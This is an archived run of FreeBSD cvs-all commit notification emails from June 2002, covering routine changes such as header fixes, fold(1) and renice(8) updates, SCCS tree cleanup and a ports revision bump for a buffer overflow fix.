Mon, 17 Jun 2002 04:21:18 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/sys consio.h X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sobomax 2002/06/17 04:21:18 PDT Modified files: (Branch: RELENG_4) sys/sys consio.h Log: MFC: make the header compatible with C++ (rev.1.14). Revision Changes Path 1.5.2.6 +4 -4 src/sys/sys/consio.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 4:22:46 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D698337B416; Mon, 17 Jun 2002 04:22:39 -0700 (PDT) Received: (from sobomax@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HBMdd98531; Mon, 17 Jun 2002 04:22:39 -0700 (PDT) (envelope-from sobomax) Message-Id: <200206171122.g5HBMdd98531@freefall.freebsd.org> From: Maxim Sobolev Date: Mon, 17 Jun 2002 04:22:39 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/lib/libstand stand.h X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sobomax 2002/06/17 04:22:39 PDT Modified files: (Branch: RELENG_4) lib/libstand stand.h Log: MFC: correct bswap64() prototype (rev.1.32). Revision Changes Path 1.18.2.8 +1 -1 src/lib/libstand/stand.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 4:24:26 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 5F11537B433; Mon, 17 Jun 2002 04:24:21 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HBOLh98641; Mon, 17 Jun 2002 04:24:21 -0700 (PDT) (envelope-from tjr) Message-Id: <200206171124.g5HBOLh98641@freefall.freebsd.org> From: "Tim J. Robbins" Date: Mon, 17 Jun 2002 04:24:21 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/fold fold.1 fold.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/17 04:24:21 PDT Modified files: (Branch: RELENG_4) usr.bin/fold fold.1 fold.c Log: MFC: Improved standards conformance, localisation, misc. style changes fold.c rev. 1.6-1.10, fold.1 rev. 1.8-1.10 Revision Changes Path 1.3.2.5 +19 -4 src/usr.bin/fold/fold.1 1.4.2.2 +95 -36 src/usr.bin/fold/fold.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 4:30:46 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4DD5537B445; Mon, 17 Jun 2002 04:30:40 -0700 (PDT) Received: (from sobomax@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HBUeL99217; Mon, 17 Jun 2002 04:30:40 -0700 (PDT) (envelope-from sobomax) Message-Id: <200206171130.g5HBUeL99217@freefall.freebsd.org> From: Maxim Sobolev Date: Mon, 17 Jun 2002 04:30:40 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/dev/usb usbdevs usbdevs.h usbdevs_data.h X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG sobomax 2002/06/17 04:30:40 PDT Modified files: (Branch: RELENG_4) sys/dev/usb usbdevs usbdevs.h usbdevs_data.h Log: MFC: change ID strings for DaisyTech devices. Revision Changes Path 1.11.2.25 +1 -1 src/sys/dev/usb/usbdevs 1.32.2.23 +2 -2 src/sys/dev/usb/usbdevs.h 1.32.2.23 +2 -2 src/sys/dev/usb/usbdevs_data.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 4:57:40 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id BE8EF37B410; Mon, 17 Jun 2002 04:57:37 -0700 (PDT) Received: (from matusita@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HBvbO06237; Mon, 17 Jun 2002 04:57:37 -0700 (PDT) (envelope-from matusita) Message-Id: <200206171157.g5HBvbO06237@freefall.freebsd.org> From: Makoto Matsushita Date: Mon, 17 Jun 2002 04:57:37 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/release Makefile X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG matusita 2002/06/17 04:57:37 PDT Modified files: (Branch: RELENG_4) release Makefile Log: Now we are in 4.6-STABLE world; change 'BASE' to 4.6. Revision Changes Path 1.536.2.85 +2 -2 src/release/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 5:10:41 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 13CCF37B419; Mon, 17 Jun 2002 05:10:38 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HCAcs12324; Mon, 17 Jun 2002 05:10:38 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206171210.g5HCAcs12324@freefall.freebsd.org> From: Juli Mallett Date: Mon, 17 Jun 2002 05:10:37 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: projects/sccs/sccscmds/util Makefile mksyswrite.sh X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/17 05:10:37 PDT Modified files: sccs/sccscmds/util Makefile Removed files: sccs/sccscmds/util mksyswrite.sh Log: Minor style cleanup to the Makefile (i.e. give it a style). Remove unused file (mksyswrite.sh). Revision Changes Path 1.12 +7 -9 projects/sccs/sccscmds/util/Makefile 1.2 +0 -5 projects/sccs/sccscmds/util/mksyswrite.sh (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 5:11:10 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D650337B40A; Mon, 17 Jun 2002 05:11:05 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HCB5r12744; Mon, 17 Jun 2002 05:11:05 -0700 (PDT) (envelope-from tjr) Message-Id: <200206171211.g5HCB5r12744@freefall.freebsd.org> From: "Tim J. Robbins" Date: Mon, 17 Jun 2002 05:11:05 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/fold fold.1 fold.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/17 05:11:05 PDT Modified files: usr.bin/fold fold.1 fold.c Log: Only advance the column position for printable characters, update manual page to emphasise that we count column positions, not characters. Revision Changes Path 1.11 +2 -2 src/usr.bin/fold/fold.1 1.11 +4 -2 src/usr.bin/fold/fold.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 5:33:18 2002 Delivered-To: cvs-all@freebsd.org Received: from mile.nevermind.kiev.ua (office.netstyle.com.ua [213.186.199.26]) by hub.freebsd.org (Postfix) with ESMTP id A116737B414; Mon, 17 Jun 2002 05:33:09 -0700 (PDT) Received: from mile.nevermind.kiev.ua (never@localhost [127.0.0.1]) by mile.nevermind.kiev.ua (8.12.3/8.12.3) with ESMTP id g5HCWksQ024646; Mon, 17 Jun 2002 15:32:47 +0300 (EEST) (envelope-from never@mile.nevermind.kiev.ua) Received: (from never@localhost) by mile.nevermind.kiev.ua (8.12.3/8.12.3/Submit) id g5HCWklC024645; Mon, 17 Jun 2002 15:32:46 +0300 (EEST) Date: Mon, 17 Jun 2002 15:32:46 +0300 From: Alexandr Kovalenko To: Brian Somers Cc: cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG Subject: Re: cvs commit: src/sys/netgraph ng_pppoe.c ng_pppoe.h Message-ID: <20020617123245.GA10032@nevermind.kiev.ua> References: <200206170219.g5H2J6U01435@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Disposition: inline In-Reply-To: <200206170219.g5H2J6U01435@freefall.freebsd.org> User-Agent: Mutt/1.3.99i Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello, Brian Somers! On Sun, Jun 16, 2002 at 07:19:06PM -0700, you wrote: > brian 2002/06/16 19:19:06 PDT > > Modified files: (Branch: RELENG_4) > sys/netgraph ng_pppoe.c ng_pppoe.h > Log: > MFC: Send a NGM_PPPOE_SESSIONID message when we establish a connection It seems that this MFC broke world in -STABLE :/ -- NEVE-RIPE Ukrainian FreeBSD User Group http://uafug.org.ua/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 5:37: 5 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 99F1D37B42A; Mon, 17 Jun 2002 05:36:39 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HCadK20582; Mon, 17 Jun 2002 05:36:39 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206171236.g5HCadK20582@freefall.freebsd.org> From: Juli Mallett Date: Mon, 17 Jun 2002 05:36:39 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: projects/sccs/sccscmds Makefile projects/sccs/sccscmds/cmd admin.c alloc.c bdiff.c cmt.c comb.c delta.c get.c makefile pathnames.h prs.c prt.c rmchg.c sccsdiff.sh snull.c val.c projects/sccs/sccscmds/com Makefile auxf.c chkid.c chksid.c ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/17 05:36:39 PDT Modified files: sccs/sccscmds Makefile sccs/sccscmds/cmd admin.c alloc.c bdiff.c cmt.c comb.c delta.c get.c makefile pathnames.h prs.c prt.c rmchg.c sccsdiff.sh snull.c val.c sccs/sccscmds/com Makefile auxf.c chkid.c chksid.c date_ab.c date_ba.c del_ab.c del_ba.c dodelt.c dofile.c dohist.c doie.c dolist.c eqsid.c flushto.c fmterr.c getline.c newstats.c permiss.c pf_ab.c putline.c rdmod.c setup.c sid_ab.c sid_ba.c sidtoser.c sinit.c stats_ab.c sccs/sccscmds/doc Makefile sccs/sccscmds/hdr defines.h extern.h fatal.h had.h macros.h sccs/sccscmds/util Makefile anystr.c bal.c cat.c clean.c curdir.c fatal.c giveup.c lockit.c maket.c patoi.c patol.c repeat.c repl.c satoi.c setsig.c substr.c trnslat.c userdir.c userexit.c username.c verify.c xcreat.c xlink.c xmsg.c xopen.c xpipe.c xunlink.c zeropad.c Log: * Add $FreeBSD$ after copyright in comments. * Finish using ${OBJS} for objects in util/Makefile. * Prevent defines.h from being included more than once. * Kill USXALLOC. * Kill an unused variable in cmd/prs.c. Christoph Hellwig * Use isatty(0) instead of old incompatible ioctl(2) calls. * isnumber() needs defined outside of FreeBSD. * __unused should only be implemented as __attribute__ in GNUC. Revision Changes Path 1.2 +1 -0 projects/sccs/sccscmds/Makefile 1.18 +2 -2 projects/sccs/sccscmds/cmd/admin.c 1.7 +2 -0 projects/sccs/sccscmds/cmd/alloc.c 1.12 +2 -0 projects/sccs/sccscmds/cmd/bdiff.c 1.16 +3 -2 projects/sccs/sccscmds/cmd/cmt.c 1.12 +2 -1 projects/sccs/sccscmds/cmd/comb.c 1.15 +2 -1 projects/sccs/sccscmds/cmd/delta.c 1.22 +2 -0 projects/sccs/sccscmds/cmd/get.c 1.17 +1 -0 projects/sccs/sccscmds/cmd/makefile 1.7 +2 -0 projects/sccs/sccscmds/cmd/pathnames.h 1.23 +2 -1 projects/sccs/sccscmds/cmd/prs.c 1.12 +2 -0 projects/sccs/sccscmds/cmd/prt.c 1.17 +2 -2 projects/sccs/sccscmds/cmd/rmchg.c 1.3 +1 -0 projects/sccs/sccscmds/cmd/sccsdiff.sh 1.13 +2 -1 projects/sccs/sccscmds/cmd/snull.c 1.16 +2 -0 projects/sccs/sccscmds/cmd/val.c 1.5 +1 -0 projects/sccs/sccscmds/com/Makefile 1.11 +2 -0 projects/sccs/sccscmds/com/auxf.c 1.9 +2 -0 projects/sccs/sccscmds/com/chkid.c 1.8 +1 -0 projects/sccs/sccscmds/com/chksid.c 1.17 +2 -0 projects/sccs/sccscmds/com/date_ab.c 1.10 +2 -0 projects/sccs/sccscmds/com/date_ba.c 1.10 +2 -0 projects/sccs/sccscmds/com/del_ab.c 1.8 +2 -0 projects/sccs/sccscmds/com/del_ba.c 1.16 +2 -0 projects/sccs/sccscmds/com/dodelt.c 1.9 +2 -0 projects/sccs/sccscmds/com/dofile.c 1.12 +3 -2 projects/sccs/sccscmds/com/dohist.c 1.8 +2 -0 projects/sccs/sccscmds/com/doie.c 1.9 +2 -0 projects/sccs/sccscmds/com/dolist.c 1.7 +2 -0 projects/sccs/sccscmds/com/eqsid.c 1.9 +2 -0 projects/sccs/sccscmds/com/flushto.c 1.9 +2 -0 projects/sccs/sccscmds/com/fmterr.c 1.8 +2 -0 projects/sccs/sccscmds/com/getline.c 1.9 +2 -0 projects/sccs/sccscmds/com/newstats.c 1.14 +2 -0 projects/sccs/sccscmds/com/permiss.c 1.10 +2 -0 projects/sccs/sccscmds/com/pf_ab.c 1.11 +2 -0 projects/sccs/sccscmds/com/putline.c 1.12 +2 -0 projects/sccs/sccscmds/com/rdmod.c 1.13 +2 -0 projects/sccs/sccscmds/com/setup.c 1.7 +2 -0 projects/sccs/sccscmds/com/sid_ab.c 1.8 +2 -0 projects/sccs/sccscmds/com/sid_ba.c 1.8 +2 -0 projects/sccs/sccscmds/com/sidtoser.c 1.10 +2 -0 projects/sccs/sccscmds/com/sinit.c 1.8 +2 -0 projects/sccs/sccscmds/com/stats_ab.c 1.2 +1 -0 projects/sccs/sccscmds/doc/Makefile 1.15 +10 -1 projects/sccs/sccscmds/hdr/defines.h 1.24 +7 -0 projects/sccs/sccscmds/hdr/extern.h 1.3 +2 -0 projects/sccs/sccscmds/hdr/fatal.h 1.4 +2 -0 projects/sccs/sccscmds/hdr/had.h 1.9 +2 -2 projects/sccs/sccscmds/hdr/macros.h 1.13 +3 -3 projects/sccs/sccscmds/util/Makefile 1.7 +2 -0 projects/sccs/sccscmds/util/anystr.c 1.6 +2 -0 projects/sccs/sccscmds/util/bal.c 1.6 +2 -0 projects/sccs/sccscmds/util/cat.c 1.4 +2 -0 projects/sccs/sccscmds/util/clean.c 1.6 +2 -0 projects/sccs/sccscmds/util/curdir.c 1.6 +2 -0 projects/sccs/sccscmds/util/fatal.c 1.6 +2 -0 projects/sccs/sccscmds/util/giveup.c 1.10 +2 -0 projects/sccs/sccscmds/util/lockit.c 1.5 +2 -0 projects/sccs/sccscmds/util/maket.c 1.5 +2 -0 projects/sccs/sccscmds/util/patoi.c 1.4 +2 -0 projects/sccs/sccscmds/util/patol.c 1.6 +2 -0 projects/sccs/sccscmds/util/repeat.c 1.5 +2 -0 projects/sccs/sccscmds/util/repl.c 1.8 +2 -0 projects/sccs/sccscmds/util/satoi.c 1.8 +2 -0 projects/sccs/sccscmds/util/setsig.c 1.7 +2 -0 projects/sccs/sccscmds/util/substr.c 1.6 +2 -0 projects/sccs/sccscmds/util/trnslat.c 1.5 +2 -0 projects/sccs/sccscmds/util/userdir.c 1.4 +2 -0 projects/sccs/sccscmds/util/userexit.c 1.5 +2 -0 projects/sccs/sccscmds/util/username.c 1.6 +2 -0 projects/sccs/sccscmds/util/verify.c 1.9 +2 -0 projects/sccs/sccscmds/util/xcreat.c 1.8 +2 -0 projects/sccs/sccscmds/util/xlink.c 1.11 +2 -0 projects/sccs/sccscmds/util/xmsg.c 1.8 +2 -0 projects/sccs/sccscmds/util/xopen.c 1.4 +2 -0 projects/sccs/sccscmds/util/xpipe.c 1.4 +2 -0 projects/sccs/sccscmds/util/xunlink.c 1.6 +2 -0 projects/sccs/sccscmds/util/zeropad.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 5:43:17 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9DF6437B40B; Mon, 17 Jun 2002 05:43:07 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HCh7q22679; Mon, 17 Jun 2002 05:43:07 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206171243.g5HCh7q22679@freefall.freebsd.org> From: Juli Mallett Date: Mon, 17 Jun 2002 05:43:07 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: projects/sccs/sccscmds/cmd admin.c get.c prs.c projects/sccs/sccscmds/hdr defines.h extern.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/17 05:43:07 PDT Modified files: sccs/sccscmds/cmd admin.c get.c prs.c sccs/sccscmds/hdr defines.h extern.h Log: Mark Valentine * Below is a patch implementing admin -fq/-dq, %Q% and prs -d:Q:. Revision Changes Path 1.19 +2 -0 projects/sccs/sccscmds/cmd/admin.c 1.23 +4 -27 projects/sccs/sccscmds/cmd/get.c 1.24 +6 -0 projects/sccs/sccscmds/cmd/prs.c 1.16 +1 -0 projects/sccs/sccscmds/hdr/defines.h 1.25 +0 -1 projects/sccs/sccscmds/hdr/extern.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 5:56:10 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6A9A737B409; Mon, 17 Jun 2002 05:56:07 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HCu7C30426; Mon, 17 Jun 2002 05:56:07 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206171256.g5HCu7C30426@freefall.freebsd.org> From: Juli Mallett Date: Mon, 17 Jun 2002 05:56:07 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: projects/sccs/sccscmds/util patoi.c patol.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/17 05:56:07 PDT Modified files: sccs/sccscmds/util patoi.c patol.c Log: * Mereley use patoi() and patol() as wrappers for strtoul(3), rather than re-implementing functionality locally. Revision Changes Path 1.6 +3 -5 projects/sccs/sccscmds/util/patoi.c 1.5 +3 -7 projects/sccs/sccscmds/util/patol.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 6:11:41 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D581C37B40F; Mon, 17 Jun 2002 06:11:37 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HDBbX37419; Mon, 17 Jun 2002 06:11:37 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206171311.g5HDBbX37419@freefall.freebsd.org> From: Juli Mallett Date: Mon, 17 Jun 2002 06:11:37 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: projects/sccs/sccscmds/util Makefile anystr.c bal.c cat.c curdir.c userdir.c username.c verify.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/17 06:11:37 PDT Modified files: sccs/sccscmds/util Makefile Removed files: sccs/sccscmds/util anystr.c bal.c cat.c curdir.c userdir.c username.c verify.c Log: * Remove parts of util/ from the build that are obviously unused. * Kill files in util/ not in the build. Revision Changes Path 1.14 +3 -3 projects/sccs/sccscmds/util/Makefile 1.8 +0 -57 projects/sccs/sccscmds/util/anystr.c (dead) 1.7 +0 -72 projects/sccs/sccscmds/util/bal.c (dead) 1.7 +0 -58 projects/sccs/sccscmds/util/cat.c (dead) 1.7 +0 -122 projects/sccs/sccscmds/util/curdir.c (dead) 1.6 +0 -63 projects/sccs/sccscmds/util/userdir.c (dead) 1.6 +0 -64 projects/sccs/sccscmds/util/username.c (dead) 1.7 +0 -55 projects/sccs/sccscmds/util/verify.c (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 6:15: 9 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8E1B037B413; Mon, 17 Jun 2002 06:15:05 -0700 (PDT) Received: (from nectar@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HDF5S37932; Mon, 17 Jun 2002 06:15:05 -0700 (PDT) (envelope-from nectar) Message-Id: <200206171315.g5HDF5S37932@freefall.freebsd.org> From: Jacques Vidrine Date: Mon, 17 Jun 2002 06:15:05 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/net/sharity-light Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG nectar 2002/06/17 06:15:05 PDT Modified files: net/sharity-light Makefile Log: Bump PORTREVISION for stack buffer overflow fix. Revision Changes Path 1.17 +2 -1 ports/net/sharity-light/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 6:15:45 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2F0E037B40F; Mon, 17 Jun 2002 06:15:42 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HDFg238075; Mon, 17 Jun 2002 06:15:42 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206171315.g5HDFg238075@freefall.freebsd.org> From: Juli Mallett Date: Mon, 17 Jun 2002 06:15:42 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: projects/sccs/sccscmds/com setup.s X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/17 06:15:42 PDT Removed files: sccs/sccscmds/com setup.s Log: Kill the undead: an unused file in assembly. Revision Changes Path 1.2 +0 -297 projects/sccs/sccscmds/com/setup.s (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 6:27:43 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0B71C37B411; Mon, 17 Jun 2002 06:27:41 -0700 (PDT) Received: (from alc@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HDRfK39671; Mon, 17 Jun 2002 06:27:41 -0700 (PDT) (envelope-from alc) Message-Id: <200206171327.g5HDRfK39671@freefall.freebsd.org> From: Alan Cox Date: Mon, 17 Jun 2002 06:27:40 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/vm vm_map.c X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG alc 2002/06/17 06:27:40 PDT Modified files: sys/vm vm_map.c Log: o Acquire and release Giant in vm_map_wakeup() to prevent a lost wakeup(). Reviewed by: tegge Revision Changes Path 1.252 +7 -0 src/sys/vm/vm_map.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 6:36:28 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4194B37B401; Mon, 17 Jun 2002 06:36:26 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HDaQD40781; Mon, 17 Jun 2002 06:36:26 -0700 (PDT) (envelope-from tjr) Message-Id: <200206171336.g5HDaQD40781@freefall.freebsd.org> From: "Tim J. Robbins" Date: Mon, 17 Jun 2002 06:36:26 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/renice renice.8 X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/17 06:36:26 PDT Modified files: usr.bin/renice renice.8 Log: Sort sections, use Dl for the example so it stands out more. Revision Changes Path 1.13 +5 -6 src/usr.bin/renice/renice.8 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 6:37:35 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6009537B40B; Mon, 17 Jun 2002 06:37:31 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5HDbVq40863; Mon, 17 Jun 2002 06:37:31 -0700 (PDT) (envelope-from tjr) Message-Id: <200206171337.g5HDbVq40863@freefall.freebsd.org> From: "Tim J. Robbins" Date: Mon, 17 Jun 2002 06:37:31 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/renice renice.8 X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG tjr 2002/06/17 06:37:31 PDT Modified files: usr.bin/renice renice.8 Log: Add Standards section. Revision Changes Path 1.14 +5 -0 src/usr.bin/renice/renice.8 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Mon Jun 17 6:41:58 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0304137B40A; Mon, 17 Jun 2002 06:41:56 -0700 